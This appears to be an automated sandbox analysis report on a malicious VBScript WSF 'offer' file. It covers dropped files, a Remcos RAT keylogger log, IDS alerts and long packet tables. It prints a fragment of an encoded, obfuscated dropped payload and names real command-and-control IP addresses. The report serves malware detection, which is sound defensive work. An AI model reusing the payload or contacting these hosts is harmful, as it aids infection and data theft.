                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m4xp1nt5.3em.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uito114p.1i1.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zoco44qv.bpu.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Roaming\Sneglefart.Glo

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                            Category:dropped
                                            Size (bytes):410244
                                            Entropy (8bit):5.9770548026443935
                                            Encrypted:false
                                            SSDEEP:12288:ajrzDp7+/4As4EauWvq2IvXvuE1XFGu1Rxa5yy:MB7+/aauWi2OXvucVGsGN
                                            MD5:AA8E1FF80B164E8028DFA9321E7A95A2
                                            SHA1:F9B328C860083A3784219725EBD5690F5BA19027
                                            SHA-256:AF2499C512C0A15453EB4E7FFE57AAE14170E7A88CEE0524A555BF65094B8018
                                            SHA-512:FAC9F4E7C72B274E55EF2925D4BE08F3C6DE4798DAF561433131CA47BA54DBC3D826E59130213F39487D46FC72BE0B44F0981D389A87B1D9B6C1C8AB54D2431D
                                            Malicious:false
                                            Preview:6wK4mOsCRKC77LwcAOsCZ7lxAZsDXCQEcQGb6wJuyrnXlVBccQGb6wKmyIHB23rZ73EBm+sCn4SB6bIQKkzrArvb6wItOOsCljlxAZu6y+uwyOsCfeLrApqYcQGb6wKEqDHK6wJscXEBm4kUC3EBm3EBm9HicQGb6wJBkIPBBHEBm3EBm4H51PVHAnzNcQGbcQGbi0QkBHEBm+sC/F2Jw3EBm+sCl/OBw5/5AgFxAZtxAZu6TGjcoOsCWB9xAZuB6k/SA9VxAZvrAni9ger9ldjL6wIDcHEBm+sCub5xAZvrArUn6wIQQosMEOsCcPBxAZuJDBNxAZvrAuR7QusC6EJxAZuB+gBJBAB11OsCZEbrAiOQiVwkDOsCWQVxAZuB7QADAADrAls9cQGbi1QkCOsC9BzrAnebi3wkBOsC48FxAZuJ63EBm3EBm4HDnAAAAOsCkvfrAvBPU3EBm3EBm2pA6wJ0K+sCjQaJ6+sCsNPrAm96x4MAAQAAAMBnAnEBm+sC7nSBwwABAADrAipP6wKXp1NxAZvrAt4JietxAZtxAZuJuwQBAABxAZtxAZuBwwQBAADrAuj26wL4blPrAq7G6wJ8Kmr/cQGbcQGbg8IFcQGbcQGbMfZxAZtxAZsxyXEBm3EBm4sa6wL4I3EBm0FxAZtxAZs5HAp19HEBm+sCDxJG6wII0esCSTaAfAr7uHXdcQGb6wKyBYtECvxxAZtxAZsp8HEBm3EBm//ScQGbcQGbugBJBABxAZtxAZsxwOsCGStxAZuLfCQM6wIXvXEBm4E0BxB+4YtxAZvrArBWg8AEcQGbcQGbOdB15esCtAnrAjdEiftxAZvrAkMO/9frAnSL6wIXsnb7IwL1/w0NLyniCtT43dwTK2huqe1SlRH/ELqyJtMK+WT1tfH/IBsShkwOwLmlhhCZcuLD/42GEHspwh7/lYYQi7A8oP+VhhBpeyNl+jLtkYE8h5n7pokQfllvj39zpjrFaTkl

                                            C:\Users\user\AppData\Roaming\mvourhjs.dat

                                            Download File
                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):394
                                            Entropy (8bit):3.3492543389610163
                                            Encrypted:false
                                            SSDEEP:12:6lnpNWWqecmlnpNWWalnpNW2bWFe5UlnpNWrlnpNWcbW+:6lpNWgcmlpNWblpNWyWqUlpNWrlpNWo5
                                            MD5:7D56EFE1C932D82F837D3AE2E5E94BA8
                                            SHA1:B846E1EBC341B33865C49EA9131A44E9FCC8AF95
                                            SHA-256:305DE02AE57C93DC8DD3F6A2A313B1438F005BA6BD8A830D6103C96D79FF931F
                                            SHA-512:71A703FEAB7ACC353B5CEE542A5852EB6F580544D3CC195A4429AAD6F913F4186BED9AC00D1F59942CA6E51F23CDB66C05DE72AB31EDBC3930D1FD77723B7080
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\mvourhjs.dat, Author: Joe Security
                                            Preview:....[.2.0.2.4./.0.4./.2.0. .1.6.:.0.5.:.3.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.0.4./.2.0. .1.6.:.0.5.:.3.9. .R.u.n.].........[.2.0.2.4./.0.4./.2.0. .1.6.:.0.5.:.4.2. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.0.4./.2.0. .1.6.:.0.5.:.4.6. .R.u.n.].........[.2.0.2.4./.0.4./.2.0. .1.6.:.0.5.:.4.8. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                            Static File Info

                                            General

                                            File type:XML 1.0 document, ASCII text, with very long lines (336), with CRLF line terminators
                                            Entropy (8bit):5.189067985250855
                                            TrID:
                                            • Generic XML (ASCII) (5005/1) 100.00%
                                            File name:rOferta_SKGNMECLemnedefinitionen353523577.wsf
                                            File size:17'539 bytes
                                            MD5:ed7122bfc1517425a483908cff86d950
                                            SHA1:d71986894ac69f6958f3e126bec9eaabea50fa5c
                                            SHA256:813142e22c4d2a79a49e1f96a9bea8b14e13a67eb9d35922b5ac0b88b33aec6a
                                            SHA512:2fae96a3d31de6195ddf196d1b4abd2c1a7564347805838f701e328ef2a823462c45d09232d7ddecd7bacacec5652808194e77c2f8f674d06cc4a61a34976636
                                            SSDEEP:384:vxuMLgrXuO5tyVsCouP+fVMD0BoqPrLjibxqWW4ZxQbIeMgJQc+Nzuz:vxtVOvyn3P+fC6fXji3+MNS
                                            TLSH:33725CA5EAC609A2CECB2345F459CA40CC2044DD4C566A5A7F85C74E343B568E3EFE4F
                                            File Content Preview:<?xml version="1.0" ?>..<job id="@JOB_ID@">..<script ..language="VBScript">..' <![CDATA[....'Kmpehjens vinnas blepharoptosis? interpolater..'Froes dispensaten..'Sensoriglandular. arbejdsfil husums28 anticiperet222..'Avocative? ugleredes, rudderpost utm

                                            File Icon

                                            Icon Hash:68d69b8f86ab9a86

                                            Static OLE Info

                                            General

                                            Document Type:Text
                                            Number of OLE Files:1

                                            OLE File "rOferta_SKGNMECLemnedefinitionen353523577.wsf"

                                            Indicators
                                            Has Summary Info:
                                            Application Name:
                                            Encrypted Document:False
                                            Contains Word Document Stream:False
                                            Contains Workbook/Book Stream:False
                                            Contains PowerPoint Document Stream:False
                                            Contains Visio Document Stream:False
                                            Contains ObjectPool Stream:False
                                            Flash Objects Count:0
                                            Contains VBA Macros:True

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            04/20/24-16:05:40.186650TCP2032776ET TROJAN Remcos 3.x Unencrypted Checkin497203050192.168.2.645.88.90.110
                                            04/20/24-16:07:49.852728TCP2032777ET TROJAN Remcos 3.x Unencrypted Server Response30504972045.88.90.110192.168.2.6

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Apr 20, 2024 16:05:06.384659052 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:06.581717014 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.581825972 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:06.582158089 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:06.778945923 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.779700994 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.779745102 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.779781103 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.779805899 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:06.779819012 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.779855967 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.779861927 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:06.779891968 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.779928923 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.779933929 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:06.779967070 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.780004025 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.780005932 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:06.780041933 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.780082941 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:06.976675987 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.976721048 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.976758003 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.976794958 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.976845980 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:06.976911068 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:06.976931095 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.976968050 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.977005959 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.977041006 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:06.977047920 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.977086067 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.977094889 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:06.977123976 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.977165937 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.977171898 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:06.977202892 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.977240086 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.977257967 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:06.977277994 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.977317095 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.977329969 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:06.977354050 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.977391958 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.977415085 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:06.977431059 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.977468014 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.977482080 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:06.977504969 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:06.977551937 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.174400091 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.174454927 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.174493074 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.174531937 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.174547911 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.174571037 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.174606085 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.174607992 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.174644947 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.174669981 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.174701929 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.174741030 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.174767017 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.174777985 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.174815893 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.174838066 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.174853086 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.174889088 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.174909115 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.174926043 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.174962044 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.174987078 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.174998999 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.175036907 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.175070047 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.175072908 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.175111055 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.175143957 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.175148964 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.175185919 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.175204039 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.175221920 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.175259113 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.175276995 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.175297022 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.175334930 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.175354958 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.175373077 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.175410032 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.175425053 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.175446987 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.175482988 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.175506115 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.175519943 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.175558090 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.175580978 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.175595045 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.175632954 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.175649881 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.175671101 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.175707102 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.175724030 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.175744057 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.175780058 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.175797939 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.175817013 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.175853014 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.175870895 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.175890923 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.175950050 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.372800112 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.372823954 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.372842073 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.372859955 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.372906923 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.372952938 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.372987032 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373004913 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373038054 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373059034 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373070002 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.373109102 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.373147964 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373203993 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373250008 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.373312950 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373373985 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373435974 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.373529911 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373595953 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373614073 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373636007 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373655081 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373671055 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.373672962 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373699903 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.373718977 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373733997 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.373735905 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373754025 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373771906 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373783112 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.373790979 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373806953 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373820066 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.373823881 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373846054 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373851061 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.373878956 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373897076 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373903990 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.373940945 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374068975 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374085903 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374102116 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374119997 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374136925 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374138117 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374155998 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374166965 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374172926 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374191046 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374201059 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374207973 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374224901 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374241114 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374253035 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374258041 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374275923 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374286890 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374294043 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374306917 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374310970 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374330044 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374344110 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374347925 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374365091 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374377966 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374388933 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374407053 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374408007 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374423027 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374440908 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374459982 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374460936 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374486923 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374489069 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374505043 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374521017 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374526024 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374538898 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374557018 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374576092 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374587059 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374593973 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374613047 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374620914 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374631882 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374644995 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374650002 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374670029 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374684095 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374686956 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374703884 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374718904 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374722958 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374739885 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374747992 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374759912 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374775887 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374793053 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374794006 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374813080 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374819040 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374830961 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374850035 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374855995 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374867916 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374885082 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374902964 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374912024 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374921083 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374938011 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374948978 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374955893 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374969959 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374973059 CEST804971087.121.105.163192.168.2.6
